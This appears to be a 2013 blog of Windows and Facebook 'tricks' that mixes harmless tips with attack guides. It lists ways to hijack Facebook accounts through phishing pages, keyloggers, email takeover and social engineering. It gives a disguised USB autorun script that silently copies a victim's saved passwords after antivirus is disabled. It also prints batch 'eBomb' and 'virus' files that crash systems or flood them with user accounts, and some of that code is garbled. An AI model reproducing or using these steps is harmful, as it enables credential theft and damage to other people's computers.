Friday 22 February 2013

How To Convert Text to MP3 Files

How To Convert Text to MP3 Files

You can easily convert your text ,pdf,xml files to mp3 in CarryOutText.
Just visit that site and easily convert yout files.

There fore you can convert files to mp3 for listening..

Facebook Hacking is Carried Out By 5 Methods

Facebook Hacking is Carried Out By 5 Methods

Facebook Hacking is Carried Out  By 5 Methods
  • Primary email address hack.
  • Social engineering.
  • Reavealing saved Facebook passwords on web-browsers.
  • Phishing : Creating fake Facebook Login page.
  • Keylogging :Installing Keylogger.

Primary email address hack.
If you have an control of  primary email address of an victim then you can get control of victims facebook profile.
You can hack victims facebook password by using forot your password trick, then the email will be sent to primary email address for reseting the facebook password then you can chage the password of victim.

Social engineering.
social engineering is method of retrieving password or answer of security question simply by asking  the victim. You must be careful while using this method as victim must not know your intention. Just ask him cautiously using your logic.

Reavealing saved Facebook passwords on web-browsers.
most of the people know this method.
Chrome: Goto tools-> Options -> Personal Stuff -> Manage saved Passwords
FireFox: Goto tools -> Options -> Security -> Saved Passwords

Phishing : Creating fake Facebook Login page.
Phishing is creating an fake login page, when victim enters the fake login page enter the authentication details then the victims details are being posted to attackers email.
The fake login page looks similar to the original facebook login page.
This is the oldest of grabbing email address and passwords.

Keylogging :Installing Keylogger.

There are two types of keyloggers
1. Hardware keylogger.
2. Software keylogger.

Software keylogger is a program that records each & every keystroke that a user types on his keyboard. Once you install this program on the target computer, it will automatically load from the start-up and start capturing every keystroke typed on that computer including usernames and passwords.

Just like Software Keyloggers Hardware keyloggers also captures keyboard keystrokes but requires Physical access to victims PC. A Hardware keylogger is a small hardware just like USB pen-drive with internal memory. These are available in different  types: PS2,wifi, USB etc.,

How To Use Multiple Yahoo Accounts In Yahoo Messenger

How To Use Multiple Yahoo Accounts In Yahoo Messenger

You can login with multiple id's on Yahoo Messenger>
Click on Start and then run, in run type regedit then hit enter.
Now you navigate HKEY_CURRENT_USER          ->       Software -> 
yahoo  ->        pager->        Test

 After creating an dword value , you rename it as plural.
Then double click on it and assign a decimal value to 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login.

How to reset your windows password using command prompt

How to reset your windows password using command prompt

How to reset your windows password using command prompt.

Click on start -> Run-> cmd
In cmd prompt type "net users " and hit enter.
net users command displays the user name of an adminstrator.

Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name Rahul, then do as follows
 Type net user Rahul * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you have successfully reset the password for Rahul without knowing his old password.

Another way of reseting password.

Click Start, and then click Run.
Type control userpasswords2, and then click OK.
On the Users tab, click the name of the user account that you want to reset the password for, and then click Reset Password.
Type a new password in the “new password” box, and then type the password again in the Confirm new password box, and then click OK.
Restart the computer, and then try to log on to Windows again.

How To Display Message On Windows XP Welcome Screen

How To Display Message On Windows XP Welcome Screen

How To Display The Message On Windows XP Welcome Screen

  • Go to Start --> Run and type regedit and hit Enter.
  •  Now Navigate for the PathHKEY_LOCAL_MACHINE\SOFTWARE\Mcft\WindowsNT\CurrentVersion\Winlogon.
  • Now change the key legalnoticeaction and change the name what ever you want, this key is used to give the name of the window to appear.
  • Modify the key legalnoticetext with what you want the window to display.
  • Restart Your Computer.

How To Hide Your Files In Image

How To Hide Your Files In Image

How To Hide Your Files In Image.

To hide your files in a image you must know some of commands of an windows command prompt and you must have a winrar. Now, lets begin.

1. Gather all files (which you want to hide) in to an specific folder any where in your pc. ( i recommend C:\Hide)

2. Now compress all files to  .rar extension ( i.e with winrar e.g. security.rar) and the file should also be in the same directory (C:\Hide).

3. Now look for JPEG picture file (e.g. xyz.jpeg). Copy and paste that file also in  Specificfolder you created  (i.e., C:\Hide) .

4.  Open Command Prompt (Click Start--> Run --> cmd) and now you go to working directory (i.e C:\Hide ).

5. In your command prompt you type

copy /b xyz.jpeg  + security.rar output.jpeg

Therefore security.rar is hidden in output.jpeg.
Now output .jpeg contains xyz.jpeg and security.rar , if you want to view image( i.e xyz.jpeg) then you can open the output.jpeg in image viewer and if you want to opensecurity.rar then you can open it with winrar archive.

How to Sniff Passwords Using USB Drive

How to Sniff Passwords Using USB Drive

How to Sniff Passwords Using USB Drive

Notice: You Must Diasable your Antivirus for creating a USB Sniffer.

Download these Five tools first.

After Downloading these tools , just copy the mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe files and save it on your USB drive.

Now open your notepad and type the following text in it.
ACTION= Perform a Virus Scan

And now save the notepad as autorun.inf on your USB Drive.

Now Again oper your notepad and type
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

 And save the notepad as launch.bat , now copy the launch.bat on to your USB Drive.

Now Insert the USB on your pc, then  autorun pop up appears , click  on  perform virus scanthen the passwords which are saved on your pc will  be stored in a USB Drive.

How To Create Files And Folders With No Name

How To Create Files And Folders With No Name

How To Create Files And Folders With No Name.

1. Create a folder or a file on desktop.
2. Now rename the folder or file by pressing F2 key or by clicking right click rename.

3. Now hold ALT button and press 0160.
Note: Type the numbers 0160 from num pad only.
4. There fore noname folder is created.

Make A Prank Error Messages On Windows

Make A Prank Error Messages On Windows

Make A Prank Error Messages On Windows

1. Start -> Run -> Notepad.
2. Now copy and paste the following text below in your notepad.

x=msgbox("Your Message Here", 2+32, "Your Title Here")
3. Change the "Your message here" and "Your Title Here" to what ever you want. I have  used 2+32 because it is the error message type of windows.
Here is the list of error messages.


0 - OK button only
1 - OK and Cancel
2 - Abort, Retry and Ignore
3 - Yes, No and Cancel
4 - Yes and No
5 - Retry and Cancel

Error Messages

16 - Critical message icon/sound
32 - Warning icon/sound
48 - Warning message/sound
64 - Info message/sound

4. Now save the notepad as filename.vbs

5. Click on filename.vbs , you will see error message on your screen.

How To Create an eBomb

How To Create an eBomb

How To Create an eBomb

1. Click on Start-> Run -> NotePad.
2. Copy the following code.

@echo off

goto %random%

start cmd.exe
goto begin

start paint.exe
goto begin

start pinball.exe
goto begin :4
start iexplore.exe
goto begin
start explorer.exe
goto begin
start iexplore.exe ""
goto begin
3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat

 This filename.bat makes your pc slow because the above program code is to open multiple process at at time so that it make your pc hang.

How To Block USB Port

How To Block USB Port

1. Click on start -> Run  and type regedit and press enter.

2. Now Go to the path

HKEY_LOCAL_MACHINE\SYSTEM\Current\ControlSet \Services\UsbStor
3. Now click on the USBSTOR, then on the right pane you will see "Start" string.

4. Right click on the Start String and Modify the value to the  4 , then your USB Ports wil be disabled.

5. To enable the USB Port modify the value to 3 in USBSTOR.

How To Create Message Annoyer

How To Create Message Annoyer

How To Create Message Annoyer

1. Click on Start -> Run -> Notepad.
2. In Notepad Paste the following code below.

@echo off
msg * Your message Here!
msg * Your message Here ?
msg * Your message Here?
msg *Your message Here.
msg * Your message Here….
msg *Your message Here…..
msg * Your message Here
msg * Your message Here
goto hacks

3. Now save your file as filename.bat
4. Now open it you will see annoying message on your PC.
Note :Only way To get rid is to restart the system.

How To Lock Computer Using Shortcut

How To Lock Computer Using Shortcut

How To Lock Computer Using Shortcut

Lock Your Computer by using a shortcut in windows.

1. Right Click on the windows, on right click you will find New -> Shortcut.
2. Popup appears asking for the location of the shortcut.

3. Now type rundll32 user32.dll,LockWorkStation in a box and save the file as filename and click finish .
4. There fore you can lock your Windows by clicking on it.

How To Display Your FaceBook Status Upside Down

How To Display Your FaceBook Status Upside Down

How To Display Your FaceBook Status Upside Down

Actually this is not an hack its just an trick to display the text upside down.
This trick is only shows the text to display as upside down.
1. Now Go to Fliptext.
2. Now type the text in the first box and then the upside down text will be shown in the other box.
3. There fore you can can copy the flipped upside down text and post it in your facebook profile.

4. Now You can view your text anywhere upside down.

How To Convert FAT To NTFS System

How To Convert FAT To NTFS System.

How To Convert FAT To NTFS   System.

1. Click on Start -> Run -> Cmd.
2. In Command Prompt type

 CONVERT [driveletter]: /FS:NTFS.
3. Type the above command and hit enter.

Now Convert.exe process will attempt to convert the file disk system.

Note: There may be data loss while  your are converting NTFS FileSystem to FATFileSystem.

How To Disable Error Reporting

How To Disable Error Reporting

How To Disable Error Reporting 

1. Right click on My Computer and on properties.
2. Now click on advanced tab there you will find  "Error Reporting".
3. Click on Error Reporting a popup window appears , now click on "Disable Error Reporting" and click on Ok.
4. There fore no error reporting is done.

Matrix Wall Command Prompt

Matrix Wall Command Prompt

1. Click Start-> run -> notepad.
2. Now copy the code below
@echo off
color 0a
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
goto top
3. After copying the  code, now save your notepad file as filename.bat (for eg:matrix.bat)
4. Now click on the filename.bat, you can see matrix code in a cmd prompt now press ALT + ENTER.
5. Matrix code will be displayed.

Create a virus using batch programming

Create a virus using batch programming

1. Start -> Run -> notepad.
2. Now copy and paste the following code in your notepad.
    Code:     @echo off     echo Muhahahaha!     :add     net user %random% /add     start acf.bat     goto add
3. Now save the notepad as filename.bat.
4. If you really want to crash your system then you can open the filename.bat

Open at your own risk!!!!!!!!

How To Block Acces To Drives For Guest Users On PC

How To Block Acces To Drives For Guest Users On PC

How To Block Acces To Drives For Guest Users On PC

1. Double click on my computer -> Select Your Drive and Right Click -> Properties.

2. In properties now click on security tab -> Click on Users tab and click on edit button.
As shown in figure.

3. Now click on full control and deny the permissions and click on click on apply as shown below.
4. Therefore others users of PC cannot access the drive.

How To Create Short Cut For Hibernation

How To Create Short Cut For Hibernation

How To Create Short Cut For Hibernation

1. Right Click on the empty desktop area, you will find different
options then you select New -> Shortcut.

2. After selecting the shortcut you will find a location, in the location paste the following
C:\Windows\System32\rundll32.exe powrprof.dll, SetSuspendState 0,1,0

o sh
 3. Click on next and give the name to shortcut. Therefore shortcut for hibernation is created.

How To Display banner on Windows boots

How To Display banner on Windows boots

How To Display banner on Windows boots

1. Click on start -> run.
2. In run type regedit and hit enter.

Note: Regedit is an registry editor.
3. Now navigate in the  registry editor to the following path.
4. Create a new string in the right pane named  LegalNoticeCaption and enter the value that you want to see in the menu bar.

5. Create a new string again by naming it as LegalNoticeText and then modify it and then insert the text you want to display while booting.
6. Therefore text is displayed on the windows screen while booting.